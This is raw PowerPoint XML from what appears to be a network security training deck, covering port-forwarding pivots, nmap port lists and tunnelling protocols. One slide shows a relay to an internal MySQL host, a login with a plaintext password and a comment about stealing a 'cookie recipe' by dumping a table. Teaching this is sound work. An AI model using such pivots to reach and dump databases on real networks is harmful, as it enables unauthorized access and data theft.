                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Local TCP relay created: :3306 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;-&gt; 192.168.30.16:3306</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># connect to grandma’s database server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –host=127.0.0.1 –u grandma –p ‘c00kies’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># steal cookie recipe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM Recipes;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>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30425692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DD419-462B-4B93-A50E-C8DDF31C45BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="120316"/>
            <a:ext cx="3932237" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3948220-E2A3-4950-BDB0-F98FE8AC7E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802105" y="1720516"/>
            <a:ext cx="10587789" cy="4627421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># show top 15 TCP ports from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -v --top-ports 15 localhost -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>21-23,25,53,80,110,135,139,143,443,445,3306,3389,8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get-content 'C:\Program Files (x86)\Nmap\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-services' | select -Skip 20 -First 15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># Fields in this file are: Service name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>portnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/protocol, open-frequency, optional comments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcpmux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0.001995        # TCP Port Service Multiplexer [rfc-1078] | TCP Port Service Multiplexer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcpmux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0.001236        # TCP Port Service Multiplexer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>compressnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0.000013        # Management Utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>compressnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0.001845        # Management Utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo    7/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0.004855</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo    7/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0.024679</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17688544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B45B2-F55D-4412-9D93-52C4D58208D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tunnelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC0EEC2E-C7FF-4744-998D-0DAF3A335A1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="1082404"/>
            <a:ext cx="6771356" cy="4894868"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEC5918C-57B6-4E57-8F22-4AC7E7A2702C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2165684"/>
            <a:ext cx="3932237" cy="3811588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Transporting data across networks by encapsulating packets in other protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtual Private Networks (VPNs) are a common example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30142521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DD419-462B-4B93-A50E-C8DDF31C45BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="120315"/>
            <a:ext cx="5368507" cy="1612231"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Tunnelling Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3948220-E2A3-4950-BDB0-F98FE8AC7E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039436" y="1840832"/>
            <a:ext cx="10650537" cy="4071884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>IP in IP (Protocol 4): IP in IPv4/IPv6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SIT/IPv6 (Protocol 41): IPv6 in IPv4/IPv6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>GRE (Protocol 47): Generic Routing Encapsulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>OpenVPN (UDP port 1194)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SSTP (TCP port 443): Secure Socket Tunneling Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>IPSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> (Protocol 50 and 51): Internet Protocol Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>L2TP (Protocol 115): Layer 2 Tunneling Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>VXLAN (UDP port 4789): Virtual Extensible Local Area Network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>GENEVE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>WireGuard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB6A877A-AC00-438F-9872-20289111EF82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039436" y="5929960"/>
            <a:ext cx="5524917" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
